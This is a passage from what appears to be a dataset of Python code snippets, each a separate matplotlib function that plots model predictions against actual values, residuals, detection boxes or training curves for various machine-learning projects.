plt.savefig(folder + '/predict_observed_' + end_name_fig + '.png')\r\n\r\n if model_fit is not None:\r\n \r\n fig, ax = plt.subplots(figsize=figsize)\r\n ax.scatter(y_predict, model_fit.resid_pearson)\r\n ax.hlines(0, 0, 1)\r\n ax.set_xlim(0, 1)\r\n ax.set_title('Residual Dependence Plot')\r\n ax.set_ylabel('Pearson Residuals')\r\n ax.set_xlabel('Fitted values') \r\n\r\n if save == True:\r\n plt.savefig(folder + '/pearson_residuals_' + end_name_fig + '.png')\r\n\r\n\r\n fig, ax = plt.subplots(figsize=figsize)\r\n res_dev_residuals = model_fit.resid_deviance.copy()\r\n res_dev_residuals_std = stats.zscore(res_dev_residuals)\r\n ax.hist(res_dev_residuals_std, bins=25)\r\n ax.set_title('Histogram of standardized deviance residuals')\r\n\r\n if save == True:\r\n plt.savefig(folder + '/standard_deviance_residuals_' + end_name_fig + '.png')\r\n\r\n graphics.gofplots.qqplot(res_dev_residuals, line='r')\r\n\r\n if save == True:\r\n plt.savefig(folder + '/gofplot_' + end_name_fig + '.png')", "def generate_results(self, test_no, test_dict):\n g_s = gridspec.GridSpec(4, 2, wspace=0.2, hspace=1.5)\n fig = plt.figure(figsize=(20, 6))\n fig.suptitle('Experiment Results', y=0.93)\n\n x_val = np.arange(1, self.iters+1)\n\n ax1 = plt.subplot(g_s[0:3, :1], label = 'Mean Rewards')\n ax1.set_title('Mean Rewards')\n ax1.scatter(x_val, self.mean_rewards, s=5)\n ax1.set(xlabel='Iteration', ylabel='Mean Reward')\n\n ax2 = plt.subplot(g_s[0:3, 1:])\n ax2.scatter(x_val, self.sub_goals, s=5, label='Sub-optimal Goal')\n ax2.scatter(x_val, self.opt_goals, s=5, label='Optimal Goal')\n ax2.set_title('Goal Success Percentage by Type')\n ax2.set(xlabel='Iteration', ylabel='Success Percentage (%)')\n ax2.legend(loc=0)\n\n cells = list(test_dict.values())\n cells = [str(i) for i in cells]\n columns = list(test_dict.keys())\n ax3 = plt.subplot(g_s[3:, :])\n ax3.axis('off')\n ax3.table(cellText=[cells], colLabels=columns, loc='center', cellLoc='center')\n\n plt.savefig(f'results/charts/Test_{test_no}.png', bbox_inches='tight')", "def plot_regression_results(ax, y_true, y_pred, title, scores, elapsed_time):\n ax.plot([y_true.min(), y_true.max()],\n [y_true.min(), y_true.max()],\n '--r', linewidth=2)\n ax.scatter(y_true, y_pred, alpha=0.2)\n\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.get_xaxis().tick_bottom()\n ax.get_yaxis().tick_left()\n ax.spines['left'].set_position(('outward', 10))\n ax.spines['bottom'].set_position(('outward', 10))\n ax.set_xlim([y_true.min(), y_true.max()])\n ax.set_ylim([y_true.min(), y_true.max()])\n ax.set_xlabel('Measured')\n ax.set_ylabel('Predicted')\n extra = plt.Rectangle((0, 0), 0, 0, fc=\"w\", fill=False,\n edgecolor='none', linewidth=0)\n ax.legend([extra], [scores], loc='upper left')\n title = title + '\\n Evaluation in {:.2f} seconds'.format(elapsed_time)\n ax.set_title(title)", "def plot_pred(y, yhat, name, output_dir):\n ax = pd.DataFrame(y, columns=[\"y%s\" % LOOK_AHEAD]).plot(figsize=(15, 10))\n pd.DataFrame(yhat, columns=[\"yhat%s\" % LOOK_AHEAD]).plot(ax=ax)\n plt.title(\"%s\" % name)\n plt.tight_layout()\n plt.savefig(f\"{output_dir / name}.png\")\n\n pd.DataFrame(y-yhat, columns=[f\"yhat {LOOK_AHEAD}\"]).plot(figsize=(15, 10))\n plt.title(\"diff-%s\" % name)\n plt.tight_layout()\n plt.savefig(f\"{output_dir / name}-diff.png\")", "def _plot_model_pred_vs_obs(self, ax):\n\n res = self._model.fit()\n\n ax.plot(self._model.endog, res.fittedvalues, '.', label='Observation')\n\n x_lim = ax.get_xlim()\n\n ax.plot(x_lim, x_lim, 'k:', label='1:1 
line')\n\n x_label = 'Observed ' + self._model.endog_names\n y_label = 'Predicted ' + self._model.endog_names\n\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n\n ax.legend(loc='best', numpoints=1)", "def plot_prediction(self, img, probs, classes):\n\n # Convert results to dataframe for plotting\n result = pd.DataFrame({\"p\": probs}, index=classes)\n\n # Show the image\n fig = plt.figure(figsize=(16, 5))\n ax = plt.subplot(1, 2, 1)\n ax.imshow(img)\n\n # Set title to be the actual class\n ax.set_title(\"\", size=20)\n\n ax = plt.subplot(1, 2, 2)\n # Plot a bar plot of predictions\n result.sort_values(\"p\")[\"p\"].plot.barh(color=\"blue\", edgecolor=\"k\", ax=ax)\n plt.xlabel(\"Predicted Probability\")\n plt.tight_layout()\n\n return fig", "def plot_test(y_test, y_pred, title = None, xlabel = 'Measured $Y = \\log_2(MIC)$', ylabel = 'Predicted $Y = \\log_2(MIC)$', legend = ['Ideal', 'Result'], groups = None):\n \n fig, ax = plt.subplots(1,1)\n fig.set_figheight(5)\n fig.set_figwidth(5)\n if groups is not None:\n groups_obj = pd.concat([y_test,y_pred], axis=1).groupby(np.array(groups))\n cmap=plt.get_cmap('tab10')\n for name, group in groups_obj:\n # Works only for groups with numeric names that are max cmap length:\n ax.plot(group.iloc[:,0], group.iloc[:,1], marker=\"o\", linestyle=\"\", label=int(name), color = cmap.colors[int(name)])\n ax.legend()\n else:\n ax.scatter(y_test,y_pred, color = 'red')\n ax_max = 10\n if np.max(y_test.values)>ax_max:\n ax_max = np.max(y_test).values\n ax_min = 0\n if np.min(y_test.values)<ax_min:\n ax_min = np.min(y_test.values)\n ax.plot([ax_min, ax_max], [ax_min, ax_max], '--', color='black')\n ax.set_aspect('equal', 'box')\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n #plt.savefig(title+'.pdf')\n plt.savefig(title+'.svg')\n #plt.savefig(title+'.png')#, dpi=600)\n #plt.show()", "def plot_pred(xy, y_prime, N=10, groundtruth=True):\n \n fig,ax = plt.subplots()\n pred_seq = y_prime.shape[2]\n obs_seq = xy.shape[1] - pred_seq\n \n if groundtruth:\n for i in range(N):\n # plot observation\n ax.plot(xy[i, :obs_seq, 2], xy[i, :obs_seq, 3], color='k')\n # plot ground truth\n ax.plot(xy[i, obs_seq-1:, 2], xy[i, obs_seq-1:, 3], color='r')\n for j, pred in enumerate(y_prime[i]):\n # concate the first step for visulization purpose\n pred = np.concatenate((xy[i, obs_seq-1:obs_seq, 2:4], pred), axis=0) \n ax.plot(pred[:, 0], pred[:, 1], color='b') \n else:\n x = xy\n obs_seq = x.shape[1] \n for i in range(N):\n # plot observation\n ax.plot(x[i, :, 2], x[i, :, 3], color='k')\n for j, pred in enumerate(y_prime[i]):\n # concate the first step for visulization\n pred = np.concatenate((x[i, obs_seq-1:obs_seq, 2:4], pred), axis=0) \n ax.plot(pred[:, 0], pred[:, 1], color='b') \n ax.set_aspect(\"equal\")\n plt.show()\n plt.gcf().clear()\n plt.close()", "def plot_comparison(step_test_data, model, inputs, outputs, start_time, end_time, plt_input=False, scale_plt=False):\n \n val_data = step_test_data.loc[start_time:end_time]\n val_data.columns = [col[0] for col in val_data.columns]\n \n Time = val_data.index\n u = val_data[inputs].to_numpy().T\n y = val_data[outputs].to_numpy().T\n\n\n # Use the model to predict the output-signals.\n mdl = np.load(model)\n \n # The output of the model\n xid, yid = fsetSIM.SS_lsim_innovation_form(A=mdl['A'], B=mdl['B'], C=mdl['C'], D=mdl['D'], K=mdl['K'], y=y, u=u, x0=mdl['X0'])\n \n # Make the plotting-canvas bigger.\n plt.rcParams['figure.figsize'] = [25, 5]\n # For each output-signal.\n for idx in range(0,len(outputs)):\n 
plt.figure(idx)\n plt.xticks(rotation=15)\n plt.plot(Time, y[idx],color='r')\n plt.plot(Time, yid[idx],color='b')\n plt.ylabel(outputs[idx])\n plt.grid()\n plt.xlabel(\"Time\")\n plt.title('output_'+ str(idx+1))\n plt.legend(['measurment', 'prediction'])\n ax=plt.gca()\n xfmt = md.DateFormatter('%m-%d-%yy %H:%M')\n ax.xaxis.set_major_formatter(xfmt) \n if scale_plt==True:\n plt.ylim(np.amin(y[idx])*.99, np.amax(y[idx])*1.01)\n \n if plt_input == True:\n for idx in range(len(outputs), len(outputs) + len(inputs)):\n plt.figure(idx)\n plt.xticks(rotation=15)\n plt.plot(Time, u[idx-len(outputs)], color='r')\n plt.ylabel(inputs[idx-len(outputs)])\n plt.grid()\n plt.xlabel(\"Time\")\n plt.title('input_'+ str(idx-len(outputs)+1))\n ax=plt.gca()\n xfmt = md.DateFormatter('%m-%d-%yy %H:%M')\n ax.xaxis.set_major_formatter(xfmt) \n plt.show()", "def plot_prediction(test_YY, predict_age_month):\n\n\t# PLot-actual vs predicted age from test image\n\tfig, ax = plt.subplots(figsize = (7,7))\n\n\tplt.plot(test_YY, predict_age_month, 'ro')\n\n\tax.plot(test_YY, predict_age_month, 'r.',\n\t\t\t\t\tlabel = 'predictions (xception)-test image')\n\n\tax.plot(test_YY, test_YY, 'b-',\n\t\t\t\t\t\t\t\tlabel = 'actual-test image')\n\n\tax.legend(loc = 'upper right')\n\tax.set_xlabel('Actual Age (Months)')\n\tax.set_ylabel('Predicted Age (Months)')\n\tplt.show()", "def plot_scatter(self):\n if Trainer.y_pred is None or Trainer.y_true is None:\n messagebox.showerror(\"Information\", \"Please train the model first before plotting\")\n return\n\n fig = plt.figure(figsize=(8, 4))\n plt.xlabel(\"Prediction\")\n plt.ylabel(\"Target\")\n plt.figtext(0, 0, f\"RMSE: {self.test_rmse}\", fontsize=13)\n plt.grid()\n plt.scatter(x=Trainer.y_true, y=Trainer.y_pred, c='b', s=1)\n\n win = tk.Toplevel()\n win.wm_title(\"Window\")\n win.geometry(\"1000x500\")\n\n # specify the window as master\n canvas = FigureCanvasTkAgg(fig, master=win)\n canvas.draw()\n canvas.get_tk_widget().grid(row=0, column=0, sticky=tk.W)\n\n # navigation toolbar\n toolbarFrame = tk.Frame(master=win)\n toolbarFrame.grid(row=1, column=0)\n toolbar = NavigationToolbar2Tk(canvas, toolbarFrame)", "def plot(self):\r\n \r\n\r\n print(\"Printing decision surfaces of decision trees\")\r\n plot_colors = \"rb\"\r\n plot_step = 0.02\r\n n_classes = 2\r\n for _ in range (self.n_estimators):\r\n plt.subplot(2, 3, _ + 1)\r\n x_min, x_max = self.X.iloc[:, 0].min() - 1, self.X.iloc[:, 0].max() + 1\r\n y_min, y_max = self.X.iloc[:, 1].min() - 1, self.X.iloc[:, 1].max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),np.arange(y_min, y_max, plot_step))\r\n plt.tight_layout(h_pad=0.5, w_pad=0.5, pad=2.5)\r\n Z = self.clfs[_].predict(np.c_[xx.ravel(), yy.ravel()])\r\n Z = np.array(Z)\r\n Z = Z.reshape(xx.shape)\r\n cs = plt.contourf(xx, yy, Z, cmap=plt.cm.RdBu)\r\n for i, color in zip(range(n_classes), plot_colors):\r\n if i == 0:\r\n idx = np.where(self.y == -1)\r\n if i == 1:\r\n idx = np.where(self.y == 1)\r\n for i in range (len(idx[0])):\r\n plt.scatter(self.X.loc[idx[0][i]][0], self.X.loc[idx[0][i]][1],c=color,cmap=plt.cm.RdBu, edgecolor='black', s=15)\r\n plt.suptitle(\"Decision surface of a decision tree using paired features\")\r\n plt.legend(loc='lower right', borderpad=0, handletextpad=0)\r\n plt.axis(\"tight\")\r\n\r\n plt.show()\r\n fig1 = plt\r\n\r\n # Figure 2\r\n print(\"Printing decision surface by combining the individual estimators\")\r\n plot_colors = \"rb\"\r\n plot_step = 0.02\r\n n_classes = 2\r\n x_min, x_max = self.X.iloc[:, 0].min() - 1, 
self.X.iloc[:, 0].max() + 1\r\n y_min, y_max = self.X.iloc[:, 1].min() - 1, self.X.iloc[:, 1].max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),np.arange(y_min, y_max, plot_step))\r\n plt.tight_layout(h_pad=0.5, w_pad=0.5, pad=2.5)\r\n Z = config.Classifier_AB.predict(np.c_[xx.ravel(), yy.ravel()])\r\n Z = np.array(Z)\r\n Z = Z.reshape(xx.shape)\r\n cs = plt.contourf(xx, yy, Z, cmap=plt.cm.RdBu)\r\n for i, color in zip(range(n_classes), plot_colors):\r\n if i == 0:\r\n idx = np.where(self.y == -1)\r\n if i == 1:\r\n idx = np.where(self.y == 1)\r\n for i in range (len(idx[0])):\r\n plt.scatter(self.X.loc[idx[0][i]][0], self.X.loc[idx[0][i]][1],c=color,cmap=plt.cm.RdBu, edgecolor='black', s=15)\r\n plt.suptitle(\"Decision surface by combining individual estimators\")\r\n plt.legend(loc='lower right', borderpad=0, handletextpad=0)\r\n plt.axis(\"tight\")\r\n\r\n plt.show()\r\n fig2 = plt\r\n\r\n return [fig1,fig2]", "def plot_results(actual_time_series, predicted_values, len_train_data,\n y_name='Parameter'):\n\n plt.plot(np.arange(0, len(actual_time_series)),\n actual_time_series, label='Actual values', c='green')\n plt.plot(np.arange(len_train_data, len_train_data + len(predicted_values)),\n predicted_values, label='Predicted', c='blue')\n # Plot black line which divide our array into train and test\n plt.plot([len_train_data, len_train_data],\n [min(actual_time_series), max(actual_time_series)], c='black',\n linewidth=1)\n plt.ylabel(y_name, fontsize=15)\n plt.xlabel('Time index', fontsize=15)\n plt.legend(fontsize=15)\n plt.grid()\n plt.show()", "def draw_pred_gt_boxes(image_outname, img, boxes, labels, scores, image_name=None, figsize=(15,15)):\n fig, (ax1, ax2) = plt.subplots(nrows=1, ncols=2, figsize=figsize)\n if image_name is not None:\n fig.suptitle(image_name)\n if isinstance(img, torch.Tensor):\n img = img.numpy().squeeze().transpose((1,2,0))\n # Display the image\n ax1.imshow(img)\n ax2.imshow(img)\n \n ax1.set_title('Prediction')\n ax2.set_title('Ground Truth')\n\n # Split prediction and ground truth\n pred_boxes, pred_labels, pred_scores = boxes[0], labels[0], scores\n gt_boxes, gt_labels = boxes[1], labels[1]\n\n # Plot prediction boxes\n for box, label, score in zip(pred_boxes, pred_labels, pred_scores):\n label = int(label)\n color = STANDARD_COLORS[label]\n x,y,w,h = box\n rect = patches.Rectangle((x,y),w,h,linewidth=1.5,edgecolor = color,facecolor='none')\n score = np.round(score, 3)\n text = '{}: {}'.format(label, str(score))\n ax1.text(x, y-3,text, color = color, fontsize=15)\n # Add the patch to the Axes\n ax1.add_patch(rect)\n\n # Plot ground truth boxes\n for box, label in zip(gt_boxes, gt_labels):\n label = int(label)\n if label <0:\n continue\n color = STANDARD_COLORS[label]\n x,y,w,h = box\n rect = patches.Rectangle((x,y),w,h,linewidth=1.5,edgecolor = color,facecolor='none')\n score = np.round(score, 3)\n text = '{}'.format(label)\n ax2.text(x, y-3,text, color = color, fontsize=15)\n # Add the patch to the Axes\n ax2.add_patch(rect)\n\n plt.axis('off')\n plt.savefig(image_outname,bbox_inches='tight')\n plt.close()", "def plot_all(m, d, m_est, d_pred, equalize=True):\n fig = plt.figure(figsize=(10,6))\n\n ax0 = fig.add_subplot(2,2,1)\n ax0.plot(m)\n t = \"$\\mathrm{{Model}}\\ m.\\ \\mathrm{{norm}}\\ {:.3f}$\"\n ax0.set_title(t.format(norm(m)))\n ax0_mi, ax0_ma = ax0.get_ylim()\n\n ax1 = fig.add_subplot(2,2,2)\n ax1.plot(d, 'o', mew=0)\n ax1.set_title(\"$\\mathrm{Data}\\ d$\")\n ax1_mi, ax1_ma = ax1.get_ylim()\n\n ax2 = fig.add_subplot(2,2,3)\n 
ax2.plot(m, alpha=0.25)\n ax2.plot(m_est)\n t = \"$\\mathrm{{Estimated\\ model}}\\ m_\\mathrm{{est}}.\\ \\mathrm{{norm}}\\ {:.3f}$\"\n ax2.set_title(t.format(norm(m_est)))\n ax2_mi, ax2_ma = ax2.get_ylim()\n\n ax3 = fig.add_subplot(2,2,4)\n ax3.plot(d, 'o', mew=0, alpha=0.25)\n ax3.plot(d_pred, 'o', mew=0)\n t = \"$\\mathrm{{Predicted\\ data}}\\ d_\\mathrm{{pred}}.\\ \\mathrm{{misfit}}\\ {:.3f}$\"\n ax3.set_title(t.format(misfit(d, d_pred)))\n ax3_mi, ax3_ma = ax3.get_ylim()\n\n if equalize:\n ax0.set_ylim(min(ax0_mi, ax2_mi) - 0.1,\n max(ax0_ma, ax2_ma) + 0.1)\n\n ax2.set_ylim(min(ax0_mi, ax2_mi) - 0.1,\n max(ax0_ma, ax2_ma) + 0.1)\n\n ax1.set_ylim(min(ax1_mi, ax3_mi) - 0.1,\n max(ax1_ma, ax3_ma) + 0.1)\n\n ax3.set_ylim(min(ax1_mi, ax3_mi) - 0.1,\n max(ax1_ma, ax3_ma) + 0.1)\n\n plt.show()", "def actual_pred_plot(preds):\r\n actual_pred = pd.DataFrame(columns=['Cost', 'prediction'])\r\n actual_pred['Cost'] = all_data['2020':].iloc[:, -1][1:len(preds) + 1]\r\n actual_pred['prediction'] = preds[:, -1]\r\n\r\n from keras.metrics import MeanSquaredError\r\n m = MeanSquaredError()\r\n m.update_state(np.array(actual_pred['Cost']), np.array(actual_pred['prediction']))\r\n\r\n return m.result().numpy(), actual_pred.plot()", "def evaluate(y_train,train_preds,y_test,test_preds,model,features):\n \n plt.figure(figsize=(3.5,3))\n train_mae = np.abs(y_train-train_preds).mean()\n test_mae = np.abs(y_test-test_preds).mean()\n print(model, split)\n print('Test MAE: %4.2f'%(test_mae))\n print('Train MAE: %4.2f'%(train_mae))\n plt.plot(y_train,train_preds,'.',c='grey',ms=3,label='Train MAE: %4.2f'%train_mae,alpha=1)\n plt.plot(y_test,test_preds,'.',c=colors[model],ms=3,label='Test MAE: %4.2f'%test_mae,alpha=1)\n #plt.title('%s: Train MAE = %.2f eV; Test MAE = %.2f eV'%(model,np.abs(y_train-train_preds).mean(),np.abs(y_test-test_preds).mean()),fontsize=10)\n\n xlim = plt.gca().get_xlim()\n ylim = plt.gca().get_ylim()\n \n alim = (min(xlim[0],ylim[0]),max(xlim[1],ylim[1]))\n\n plt.plot(alim,alim,'-k',lw=1)\n plt.gca().set_ylim(alim)\n plt.gca().set_xlim(alim)\n\n plt.xlabel('$\\Delta E$ (eV)')\n plt.ylabel('$\\Delta E$ Predicted (eV)')\n\n plt.legend(loc='best')\n\n plt.tight_layout()\n plt.savefig('./parity/'+model+'_'+features+'_'+split+'_parity.pdf')\n \n #Functionality to plot histogram of error if desired\n\n #plt.figure()\n #plt.hist(preds-y,bins=100)\n #plt.xlabel('$\\hat{y} - y$ (eV)')\n #plt.title('%s %s: MAE = %.2f eV'%(model,tt,np.abs(y-preds).mean()))\n\n #xlim = np.array(plt.gca().get_xlim())\n #xmax = np.abs(xlim).max()\n #plt.gca().set_xlim([-xmax,xmax])\n\n #plt.savefig('./output/'+model+'_'+features+'_'+split+'_'+tt+'_hist.pdf')\n\n return", "def plot_results(self):\n\n\n f1, ax1 = plt.subplots()\n h1, = ax1.plot(self.history[\"step\"], self.history[\"trainLoss\"],\\\n \"b-\", label=\"Loss - Train\")\n h2, = ax1.plot(self.history[\"step\"], self.history[\"validLoss\"],\\\n \"b.\", label=\"Loss - Validation\")\n\n ax1.set_ylabel(\"Loss\", color = \"blue\")\n ax1.tick_params(\"y\", color = \"blue\")\n ax1.yaxis.label.set_color(\"blue\")\n ax1.set_xlabel(\"Training Steps [{}]\".format(self.FLAGS.eval_every))\n\n ax2 = ax1.twinx()\n h3, = ax2.plot(self.history[\"step\"], self.history[\"trainAccr\"], \"r-\",\\\n label = \"Accuracy - Train\")\n h4, = ax2.plot(self.history[\"step\"], self.history[\"validAccr\"], \"r.\",\\\n label = \"Accuracy - Validation\")\n\n ax2.set_ylabel(\"Accuracy\", color = \"red\")\n ax2.tick_params(\"y\", color = \"red\")\n ax2.yaxis.label.set_color(\"red\")\n\n hds = 
[h1,h2,h3,h4]\n lbs = [l.get_label() for l in hds]\n ax1.legend(hds, lbs)\n f1.tight_layout()\n plt.savefig(\"trainingHistory.png\")\n\n plt.close(f1)\n #plt.show()", "def plot_preds(axes: np.ndarray, y_true: np.ndarray, y_pred: np.ndarray, n_agents: int,\n n_options: int) -> None:\n n = y_true.shape[0]\n\n n_timesteps = int(y_true.size / (n * n_agents * n_options))\n y_true = np.reshape(y_true, (n, n_timesteps, n_agents, n_options))\n y_pred = np.reshape(y_pred, (n, n_timesteps, n_agents, n_options))\n\n for i in range(n):\n for option in range(n_options):\n ax = axes[i * 2 + option, 0]\n for agent in range(n_agents):\n ax.plot(y_true[i][:, agent, option], label=str(agent))\n for option in range(n_options):\n ax = axes[i * 2 + option, 1]\n for agent in range(n_agents):\n ax.plot(y_pred[i][:, agent, option], label=str(agent))", "def plot_results(sgd_train_acc, sgd_train_std, sgd_heldout_acc, sgd_heldout_std, sgd_test_acc,\n dt_train_acc, dt_train_std, dt_heldout_acc, dt_heldout_std, dt_test_acc,\n dt4_train_acc, dt4_train_std, dt4_heldout_acc, dt4_heldout_std, dt4_test_acc,\n stumps_train_acc, stumps_train_std, stumps_heldout_acc, stumps_heldout_std, stumps_test_acc):\n train_x_pos = [0, 4, 8, 12]\n cv_x_pos = [1, 5, 9, 13]\n test_x_pos = [2, 6, 10, 14]\n ticks = cv_x_pos\n\n labels = ['sgd', 'dt', 'dt4', 'stumps (4 x 50)']\n\n train_accs = [sgd_train_acc, dt_train_acc, dt4_train_acc, stumps_train_acc]\n train_errors = [sgd_train_std, dt_train_std, dt4_train_std, stumps_train_std]\n\n cv_accs = [sgd_heldout_acc, dt_heldout_acc, dt4_heldout_acc, stumps_heldout_acc]\n cv_errors = [sgd_heldout_std, dt_heldout_std, dt4_heldout_std, stumps_heldout_std]\n\n test_accs = [sgd_test_acc, dt_test_acc, dt4_test_acc, stumps_test_acc]\n\n fig, ax = plt.subplots()\n ax.bar(train_x_pos, train_accs, yerr=train_errors, align='center', alpha=0.5, ecolor='black', capsize=10, label='train')\n ax.bar(cv_x_pos, cv_accs, yerr=cv_errors, align='center', alpha=0.5, ecolor='black', capsize=10, label='held-out')\n ax.bar(test_x_pos, test_accs, align='center', alpha=0.5, capsize=10, label='test')\n ax.set_ylabel('Accuracy')\n ax.set_xticks(ticks)\n ax.set_xticklabels(labels)\n ax.set_title('Models')\n ax.yaxis.grid(True)\n ax.legend()\n plt.tight_layout()", "def visualize_data(y_test, x_test, window_out, num_plots, num_win_ser, cols_y, col_idx):\n \n \n ser_idx = [i for i in range(0, len(y_test), num_win_ser)]\n if num_plots > len(ser_idx):\n print(\"Too many plots, reduce the mumber\")\n else:\n indx = ser_idx[0:num_plots]\n days = range(num_win_ser)\n for idx in indx:\n CR = x_test[idx][0][3]\n #pred = y_pred[idx : idx+num_win_ser, window_out -1, col_idx]\n true = y_test[idx : idx+num_win_ser, window_out -1, col_idx]\n \n plt.title(\"Y_True, CR: \"+ str(CR))\n plt.xlabel('Days')\n plt.ylabel(cols_y[col_idx])\n \n #plt.plot(days, pred, label = 'Pred')\n plt.plot(days, true, label = 'True')\n \n plt.legend()\n plt.show()", "def prediction_plotter(X_Test, gp):\r\n newX = X_Test[:, None]\r\n predictions_array = np.zeros((3,2,np.shape(X_Test)[0]))\r\n\r\n for i in [-1, 0, 1]:\r\n each_axis_test = np.hstack([newX,np.ones_like(newX)+i])\r\n predictions_array[i, :,:] = np.squeeze(gp.predict(each_axis_test, include_likelihood=False))\r\n predictions_array = predictions_array[:,0,:]\r\n\r\n corrected_predictions = np.zeros((3, np.shape(X_Test)[0]))\r\n corrected_predictions[0,:] = predictions_array[2,:]\r\n corrected_predictions[1, :] = predictions_array[0, :]\r\n corrected_predictions[2, :] = predictions_array[1, :]\r\n\r\n 
trajectory_plotter(corrected_predictions[None, :, :])\r\n return predictions_array", "def test_exercise_2():\n dirname = os.path.dirname(os.path.realpath(__file__))\n df = pd.read_pickle(f\"{dirname}/material/data-consumption-function.pkl\")\n\n def construct_predicted_values(income, alpha, beta, gamma):\n return alpha + beta * income ** gamma\n\n mock_rslt = [-91.1933, 0.5691, 1.0204]\n income = df[\"realgdp\"].values\n df[\"realcons_pred\"] = construct_predicted_values(income, *mock_rslt)\n\n x = df.index.get_level_values(\"Year\")\n fig, ax = plt.subplots()\n ax.plot(x, df[\"realcons_pred\"], label=\"Predicted\")\n ax.plot(x, df[\"realcons\"], label=\"Observed\")", "def compare_plots(data_list, title_list, perp_list = [5, 30, 100], step_list = [10, 50, 1000], \\\n perp_plot = True, step_plot_perp = 30, verbose = False, plot_3d = False, \\\n cdict = {1: 'red', 2: 'mediumspringgreen', 3: 'royalblue'}, df = 1):\n \n # Determine dimensions of plot grid\n nrows = len(perp_list) + 1\n ncols = len(data_list)\n \n # Configure axes\n axes = []\n fig = plt.figure(figsize = (16, 3 * nrows))\n \n # Generate plots of starting points (first two columns for high-dimensional)\n for index, dat in enumerate(data_list):\n X, labs = dat\n \n # Check whether original data should be plotted in 3D, and adjust axes accordingly\n if plot_3d:\n axes.append(fig.add_subplot(nrows, ncols, 1 + index, projection = '3d'))\n axes[-1].scatter(xs = X[:, 0], ys = X[:, 1], zs = X[:, 2], edgecolor = None, alpha = 0.8, \\\n c = np.array(list(map(lambda x: cdict[x], labs))))\n axes[-1].set_axis_off()\n else:\n axes.append(fig.add_subplot(nrows, ncols, 1 + index))\n plt.scatter(x = X[:, 0], y = X[:, 1], edgecolor = None, alpha = 0.8, \\\n c = np.array(list(map(lambda x: cdict[x], labs))))\n axes[-1].set_xticklabels([])\n axes[-1].set_yticklabels([])\n axes[-1].xaxis.set_ticks_position('none')\n axes[-1].yaxis.set_ticks_position('none')\n axes[-1].set_title(\"\\n\".join(wrap(title_list[index], 35))) \n \n # Based on function input, generate either perplexity plots of interim iteration plots\n if perp_plot:\n # Generate plots of t-SNE output for different perplexities\n for perp in range(len(perp_list)):\n low_d = tsne(X = X, perplexity = perp_list[perp], verbose = verbose, optim = \"fastest\", df = df)\n axes.append(fig.add_subplot(nrows, ncols, 1 + index + (perp + 1) * ncols))\n axes[-1].set_title(\"Perplexity = \" + str(perp_list[perp]))\n plt.scatter(x = low_d[-1, :, 0], y = low_d[-1, :, 1], edgecolor = None, alpha = 0.8, \\\n c = np.array(list(map(lambda x: cdict[x], labs))))\n axes[-1].set_xticklabels([])\n axes[-1].set_yticklabels([])\n axes[-1].xaxis.set_ticks_position('none')\n axes[-1].yaxis.set_ticks_position('none')\n else:\n # Generate plots of t-SNE output for different iterations\n low_d = tsne(X = X, perplexity = step_plot_perp, niter = np.max(step_list), verbose = verbose, optim = \"fastest\", \\\n df = df)\n for step in range(len(step_list)):\n axes.append(fig.add_subplot(nrows, ncols, 1 + index + (step + 1) * ncols))\n axes[-1].set_title(\"Perplexity = \" + str(step_plot_perp) + \", Step = \" + str(step_list[step]))\n plt.scatter(x = low_d[step_list[step], :, 0], y = low_d[step_list[step], :, 1], \\\n edgecolor = None, alpha = 0.8,\\\n c = np.array(list(map(lambda x: cdict[x], labs))))\n axes[-1].set_xticklabels([])\n axes[-1].set_yticklabels([])\n axes[-1].xaxis.set_ticks_position('none')\n axes[-1].yaxis.set_ticks_position('none')", "def plot_results(y_trues, y_preds, marker='o', ms=5, fillstyle=None,\n 
linestyle='None', output_file=None):\n n_folds = len(y_trues)\n plt.figure(figsize=(6, 6 * n_folds))\n\n for i, (y_true, y_pred) in enumerate(zip(y_trues, y_preds)):\n\n plt.subplot(n_folds, 1, i + 1)\n\n # Plot each point\n plt.plot(y_true, y_pred, marker=marker, ms=ms,\n fillstyle=fillstyle, linestyle=linestyle, color='C0')\n\n # Plot the perfect line\n min_age = np.min(np.r_[y_true, y_pred])\n max_age = np.max(np.r_[y_true, y_pred])\n plt.plot([min_age, max_age], [min_age, max_age], color='C1')\n\n # Compute the MAE\n mae = mean_absolute_error(y_true, y_pred)\n r, _ = spearmanr(y_true, np.abs(y_true - y_pred))\n\n # Add a title\n plt.title(\"Fold {0}\\nMAE={1:0.3f} - r={2:0.3f}\"\n .format(i + 1, mae, r), fontsize=16)\n plt.xlabel(\"True age\", fontsize=12)\n plt.ylabel(\"Predicted age\", fontsize=12)\n\n plt.subplots_adjust(hspace=0.45)\n\n if output_file is not None:\n plt.savefig(output_file)\n\n plt.show()", "def plot_predictions(y, yhat, title=\"Predictions vs Actual\", output_dir=None):\n\n fig = plt.figure(figsize=(15, 6))\n plt.xlabel('Time')\n plt.ylabel('PM10')\n plt.plot(y, label=\"actual\", figure=fig)\n plt.plot(yhat, label=\"predicted\", figure=fig)\n plt.title(title)\n fig.legend()\n\n if output_dir != None:\n plt.savefig(os.path.join(output_dir, \"{}.png\".format(title)))\n\n plt.close(fig)", "def plot_heldout_prediction(input_val,\n y_val,\n mu_val,\n sigma_val,\n fname=None,\n n=1,\n title=\"\"):\n fig = figure.Figure(figsize=(9, 3 * n))\n canvas = backend_agg.FigureCanvasAgg(fig)\n for i in range(n):\n ax = fig.add_subplot(n, i + 1, 1)\n ax.plot(input_val, y_val, label='True data')\n ax.plot(input_val, mu_val, label='Predictive mean')\n lower = mu_val - 1.96 * sigma_val\n upper = mu_val + 1.96 * sigma_val\n ax.fill_between(\n input_val, lower, upper, label='95% confidence interval')\n\n plt.legend()\n fig.suptitle(title)\n fig.tight_layout()\n\n if fname is not None:\n canvas.print_figure(fname, format=\"png\")\n print(\"saved {}\".format(fname))", "def visualize_predictions(self, images, preds, targets):\n\n class_names = ['angry', 'happy', 'sad']\n images = images[:8]\n preds = preds[:8]\n targets = targets[:8]\n\n # determine size of the grid based for the given batch size\n num_rows = int(torch.tensor(len(images)).float().sqrt().floor())\n\n fig = plt.figure(figsize=(7, 7))\n for i in range(len(images)):\n plt.subplot(num_rows, len(images) // num_rows + 1, i+1)\n img = images[i].permute(1, 2, 0).cpu().numpy()\n img = np.array([0.229, 0.224, 0.225]) * img + np.array([0.485, 0.456, 0.406])\n img = np.clip(img, 0, 